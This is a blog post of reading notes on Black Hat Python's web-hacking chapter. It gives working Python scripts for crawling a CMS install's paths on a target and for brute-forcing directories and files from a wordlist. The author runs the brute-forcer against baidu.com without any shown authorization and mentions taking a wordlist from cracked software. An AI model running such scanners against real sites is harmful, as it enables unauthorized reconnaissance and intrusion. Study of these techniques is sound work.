Reading Notes: Black Hat Python (Part 4)

Source: Internet | Editor: 程序博客网 | Date: 2024/06/02 08:52

Reading notes series

I keep reading, forgetting what I read, and reading it again. Better to write down what I learn each time.

Chapter 5: Web Hacking

The Socket Library of the Web: urllib2

Star of Chapter 2: Paramiko
Star of Chapter 3: socket
Star of Chapter 4: Scapy
Star of Chapter 5: urllib2
This section takes a look at the urllib2 library.
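urllib2 is a very handy HTTP client library. When making URL requests with it you can set a proxy, a timeout, headers, redirect handling and cookies, send HTTP PUT and DELETE requests (by overriding Request.get_method), read the HTTP status code, submit form data, and so on. It is quite powerful.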
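For reference, a sketch of a few of those features in Python 3, where urllib2 became urllib.request. The URL, request body and proxy address are placeholders I made up, and nothing is actually sent over the network:

```python
import http.cookiejar
import urllib.request

# Placeholder URL; nothing below opens a connection.
url = "http://www.example.com/api/item"

# Custom headers plus a non-GET method. The method= argument exists since
# Python 3.3; with Python 2's urllib2 you would instead override get_method,
# e.g. request.get_method = lambda: "PUT".
req = urllib.request.Request(
    url,
    data=b"name=test",
    headers={"User-Agent": "Googlebot"},
    method="PUT",
)

# An opener that sends HTTP traffic through a (placeholder) proxy
# and keeps cookies between requests.
cookies = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(
    urllib.request.ProxyHandler({"http": "http://127.0.0.1:8080"}),
    urllib.request.HTTPCookieProcessor(cookies),
)

print(req.get_method())              # PUT
print(req.get_header("User-agent"))  # Googlebot (urllib capitalizes header names)

# To really send it, with a 5-second timeout:
# response = opener.open(req, timeout=5)
# print(response.getcode(), response.geturl())
```

Note that the header is looked up as "User-agent": Request stores header names via str.capitalize().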
In this section the author shows the basic usage: fetching a web page with urllib2.

```python
import urllib2

url = 'http://www.baidu.com'

# pretend to be Google's crawler
headers = {}
headers['User-Agent'] = 'Googlebot'

request = urllib2.Request(url, headers=headers)
response = urllib2.urlopen(request)

print response.geturl()  # final URL, after any redirects
print response.read()    # page body
response.close()
```

Mapping Open-Source Web App Installations

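The goal of this section is to crawl all the files of a website built on an open-source framework.
Why target open-source sites?
The reason is simple: the attacker can set up a mock site locally with the same framework, learn the hierarchy of its files and directories, and then request those same paths on the target site.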
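The mapping step can be sketched in Python 3 with pathlib: walk a local copy of the app and turn every file into the path it should have on the target. The directory layout below is a made-up example built in a temporary directory, and comparing extensions case-insensitively is my own assumption (the book's version is case-sensitive):

```python
import tempfile
from pathlib import Path

# Extensions to skip. Path.suffix returns ".png", so the leading dot matters.
FILTERS = {".jpg", ".gif", ".png", ".css"}

def local_tree_to_url_paths(root, filters=FILTERS):
    """Turn every file under a local install into a URL path such as /admin/login.php."""
    root = Path(root)
    paths = []
    for file in sorted(root.rglob("*")):
        if file.is_file() and file.suffix.lower() not in filters:
            # as_posix() gives forward slashes even on Windows
            paths.append("/" + file.relative_to(root).as_posix())
    return paths

# Build a tiny fake "install" (hypothetical layout, for illustration only).
with tempfile.TemporaryDirectory() as tmp:
    for rel in ["index.php", "admin/login.php", "images/logo.PNG", "templates/site.css"]:
        path = Path(tmp, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text("")
    url_paths = local_tree_to_url_paths(tmp)

print(url_paths)  # ['/admin/login.php', '/index.php']
```

Each resulting path is then appended to the target's base URL and requested.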

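The author stresses one thing in this section's code: the use of Queue. Almost everyone who writes multithreaded Python uses it, because it is thread-safe. Here the Queue holds the URLs to crawl; several threads are started, and each one repeatedly takes a URL from the Queue and requests it.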
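A minimal sketch of that Queue-plus-threads pattern in Python 3 (where the module is named queue). fake_fetch is a hypothetical stand-in for the HTTP request so the example runs offline. One deliberate difference from the book's loop: instead of while not q.empty(): q.get(), each worker calls get_nowait() and exits on queue.Empty, so a thread cannot block forever when another thread grabs the last item between the two calls.

```python
import queue
import threading

def fake_fetch(path):
    """Hypothetical stand-in for an HTTP request: pretend only /index.php exists."""
    return 200 if path == "/index.php" else 404

def worker(paths, results, lock):
    while True:
        try:
            # get_nowait() avoids the race between empty() and get()
            path = paths.get_nowait()
        except queue.Empty:
            return  # nothing left, let the thread finish
        status = fake_fetch(path)
        with lock:
            results.append((status, path))

paths = queue.Queue()
for p in ["/index.php", "/admin/login.php", "/robots.txt"]:
    paths.put(p)

results = []
lock = threading.Lock()
threads = [threading.Thread(target=worker, args=(paths, results, lock)) for _ in range(3)]
for t in threads:
    t.start()
for t in threads:
    t.join()

print(sorted(results))
# [(200, '/index.php'), (404, '/admin/login.php'), (404, '/robots.txt')]
```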

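Speaking of open-source frameworks, the author mentions Joomla, WordPress and Drupal, but why not Django or Ghost? To try the code in this section you need at least one of them installed; I have only installed Ghost and haven't tested it yet.
The code: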

```python
import Queue
import threading
import os
import urllib2

threads = 10

target = "http://www.test.com"
directory = "/Users/justin/Downloads/joomla-3.1.1"
# splitext() returns extensions with a leading dot, so ".png" (not "png")
filters = [".jpg", ".gif", ".png", ".css"]

os.chdir(directory)

web_paths = Queue.Queue()

# map every file of the local install to the path it should have on the target
for r, d, f in os.walk("."):
    for files in f:
        remote_path = "%s/%s" % (r, files)
        if remote_path.startswith("."):
            remote_path = remote_path[1:]
        if os.path.splitext(files)[1] not in filters:
            web_paths.put(remote_path)

def test_remote():
    while not web_paths.empty():
        path = web_paths.get()
        url = "%s%s" % (target, path)

        request = urllib2.Request(url)

        try:
            response = urllib2.urlopen(request)
            content = response.read()

            print "[%d] => %s" % (response.code, path)
            response.close()

        except urllib2.HTTPError as error:
            # print "Failed %s" % error.code
            pass

for i in range(threads):
    print "Spawning thread: %d" % i
    t = threading.Thread(target=test_remote)
    t.start()
```

Brute-Forcing Directories and File Locations

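Brute forcing simply means that, knowing nothing about the target, you go through a wordlist and try every entry one by one; it only costs time.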
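To make "try every entry" concrete, here is a Python 3 sketch of how one wordlist entry expands into candidate URL paths, following the same rule as the book's dir_bruter: no dot means a directory, otherwise a file, plus optional extra extensions. expand_word is a name I made up for illustration:

```python
from urllib.parse import quote

def expand_word(word, extensions=None):
    """Hypothetical helper: turn one wordlist entry into the URL paths to try."""
    # no dot -> treat as a directory, otherwise as a file
    attempts = ["/%s/" % word] if "." not in word else ["/%s" % word]
    # optionally try the same word with extra extensions (backups, includes, ...)
    for ext in extensions or []:
        attempts.append("/%s%s" % (word, ext))
    # quote() percent-encodes spaces and other unsafe characters but keeps "/"
    return [quote(a) for a in attempts]

print(expand_word("admin", [".php", ".bak"]))  # ['/admin/', '/admin.php', '/admin.bak']
print(expand_word("my file.txt"))              # ['/my%20file.txt']
```

Each path is then appended to the target's base URL; with a wordlist of N entries and E extensions that is up to N × (E + 1) requests, which is why the work is spread over threads.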
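Such wordlists can be downloaded from open-source projects. The author recommends two, DirBuster and SVNDigger, as well as Burp Suite, the web attack powerhouse covered in the next chapter.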
https://www.netsparker.com/blog/web-security/svn-digger-better-lists-for-forced-browsing/
https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
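In this section the author uses the SVNDigger wordlist to brute-force the target site; download the all.txt file from the link above and use it as the wordlist.
I tried this code myself, with the target changed to baidu: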

```python
import urllib2
import urllib
import threading
import Queue

threads = 5
target_url = "http://www.baidu.com"
wordlist_file = "all.txt"  # from SVNDigger
resume = None
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"

def build_wordlist(wordlist_file):
    # read in the word list
    fd = open(wordlist_file, "rb")
    raw_words = fd.readlines()
    fd.close()

    found_resume = False
    words = Queue.Queue()

    for word in raw_words:
        word = word.rstrip()

        # if resume is set, skip words until we reach it
        if resume is not None:
            if found_resume:
                words.put(word)
            else:
                if word == resume:
                    found_resume = True
                    print "Resuming wordlist from: %s" % resume
        else:
            words.put(word)

    return words

def dir_bruter(extensions=None):
    while not word_queue.empty():
        attempt = word_queue.get()
        attempt_list = []

        # check if there is a file extension; if not,
        # it's a directory path we're bruting
        if "." not in attempt:
            attempt_list.append("/%s/" % attempt)
        else:
            attempt_list.append("/%s" % attempt)

        # if we want to bruteforce extensions
        if extensions:
            for extension in extensions:
                attempt_list.append("/%s%s" % (attempt, extension))

        # iterate over our list of attempts
        for brute in attempt_list:
            url = "%s%s" % (target_url, urllib.quote(brute))

            try:
                headers = {}
                headers["User-Agent"] = user_agent
                r = urllib2.Request(url, headers=headers)

                response = urllib2.urlopen(r)

                if len(response.read()):
                    print "[%d] => %s" % (response.code, url)

            except urllib2.HTTPError, e:
                if e.code != 404:
                    print "!!! %d => %s" % (e.code, url)

# the queue the worker threads read from must be named word_queue
word_queue = build_wordlist(wordlist_file)
extensions = [".php", ".bak", ".orig", ".inc"]

for i in range(threads):
    t = threading.Thread(target=dir_bruter, args=(extensions,))
    t.start()
```

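When I ran it, every single path came back as found. It turns out that for a nonexistent URL Baidu does not return a 4xx status but a 3xx redirect; urllib2 follows the redirect automatically and downloads the page it points to. That page is Baidu's error page, which to the code looks like any normal page, so the status code printed is 200. The attack code therefore needs a tweak: check whether the URL of the response is still the URL we requested. Luckily urllib2 provides this through response.geturl(), which returns the final URL after any redirects. Adding one check in front of the print in the original code is enough: if response.geturl() == url: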

```
[200] => http://www.baidu.com/root/
[200] => http://www.baidu.com/CVS/
[200] => http://www.baidu.com/common/
[200] => http://www.baidu.com/Entries/
[200] => http://www.baidu.com/lang/
[200] => http://www.baidu.com/root.php
[200] => http://www.baidu.com/Entries.php
```

```
$ curl http://www.baidu.com/root/ -i
HTTP/1.1 302 Found
Via: 1.1 TMG3
Connection: Keep-Alive
Proxy-Connection: Keep-Alive
Content-Length: 222
Expires: Sat, 20 Feb 2016 02:33:59 GMT
Date: Fri, 19 Feb 2016 02:33:59 GMT
Location: http://www.baidu.com/search/error.html
Content-Type: text/html; charset=iso-8859-1
Server: Apache
Cache-Control: max-age=86400

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.baidu.com/search/error.html">here</a>.</p>
</body></html>
```
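Two ways to handle this, sketched in Python 3 against a throwaway local server that imitates the redirect-to-error-page behaviour (the handler, paths and port are hypothetical; nothing contacts baidu). The first compares geturl() with the requested URL, as described above. The second stops following redirects so the 302 shows up directly, as in the curl output; it relies on urllib raising HTTPError when a redirect handler's redirect_request returns None.

```python
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

class Handler(BaseHTTPRequestHandler):
    """Hypothetical stand-in: known paths return 200, anything else gets a
    302 to an error page instead of a 404."""
    EXISTING = {"/real/", "/search/error.html"}

    def do_GET(self):
        if self.path in self.EXISTING:
            body = b"ok"
            self.send_response(200)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        else:
            self.send_response(302)
            self.send_header("Location", "/search/error.html")
            self.send_header("Content-Length", "0")
            self.end_headers()

    def log_message(self, *args):
        pass  # silence the default request logging

class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Returning None means the redirect is not followed; the 3xx then
    surfaces as an HTTPError, much like `curl -i` shows it."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None

server = HTTPServer(("127.0.0.1", 0), Handler)  # port 0: the OS picks a free port
threading.Thread(target=server.serve_forever, daemon=True).start()
base = "http://127.0.0.1:%d" % server.server_address[1]

# ProxyHandler({}) ignores any *_proxy environment variables for this local test.
following = urllib.request.build_opener(urllib.request.ProxyHandler({}))
not_following = urllib.request.build_opener(urllib.request.ProxyHandler({}), NoRedirect())

found_by_geturl = []
redirects = {}
for path in ["/real/", "/root/", "/CVS/"]:
    url = base + path

    # Approach 1: follow redirects, but only count a hit if we stayed on our URL.
    with following.open(url, timeout=5) as response:
        if response.geturl() == url:
            found_by_geturl.append(path)

    # Approach 2: don't follow redirects and look at the raw status code.
    try:
        not_following.open(url, timeout=5).close()
    except urllib.error.HTTPError as e:
        redirects[path] = (e.code, e.headers.get("Location"))
        e.close()

server.shutdown()
server.server_close()

print(found_by_geturl)  # ['/real/']
print(redirects)  # {'/root/': (302, '/search/error.html'), '/CVS/': (302, '/search/error.html')}
```

The second approach costs one request per path instead of two, and also lets you tell "redirected" apart from "really there".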

Brute-Forcing HTML Form Authentication

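In this section the author analyzes the HTML of the Joomla login page and then brute-forces it with urllib2 and HTMLParser. I haven't downloaded the wordlist or installed Joomla yet, so I'll try this code later.
The wordlist is downloaded from http://www.oxid.it/cain.html; I'll download it when the network connection is better.
Joomla looks pretty good; I'll try it when I get home.
Without getting around the firewall, I first downloaded a cracked portable package (http://www.wmzhe.com/soft-18663.html) and found a wordlist.txt file in it, which is probably the one.
Leaving a # TODO here.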
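The form-parsing part can be sketched without a live Joomla: an HTMLParser subclass that collects every input field (hidden token fields included) so they can be sent back with each username/password guess. This is a Python 3 sketch (html.parser and urllib.parse.urlencode); the sample form, its field names and the token value are made up for illustration, loosely shaped like a CMS admin login:

```python
from html.parser import HTMLParser
from urllib.parse import urlencode

class FormFieldParser(HTMLParser):
    """Collect name -> value for every <input> on a page, including hidden
    anti-CSRF tokens that a login POST usually has to echo back."""
    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            attrs = dict(attrs)
            name = attrs.get("name")
            if name:
                # inputs without a value attribute are sent as empty strings
                self.fields[name] = attrs.get("value") or ""

# Hypothetical login form; field names and token are invented.
html = """
<form action="/administrator/index.php" method="post">
  <input type="text" name="username" value="">
  <input type="password" name="passwd">
  <input type="hidden" name="task" value="login">
  <input type="hidden" name="4a40c518220c1993f0e02dc4712c5794" value="1">
</form>
"""

parser = FormFieldParser()
parser.feed(html)
parser.close()
fields = parser.fields

# Fill in one username/password guess and encode the POST body.
fields["username"] = "admin"
fields["passwd"] = "password123"
post_body = urlencode(fields)
print(post_body)
# username=admin&passwd=password123&task=login&4a40c518220c1993f0e02dc4712c5794=1
```

In a real run the page would be fetched fresh for every guess (with cookies kept), since the token usually changes per session.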

1 0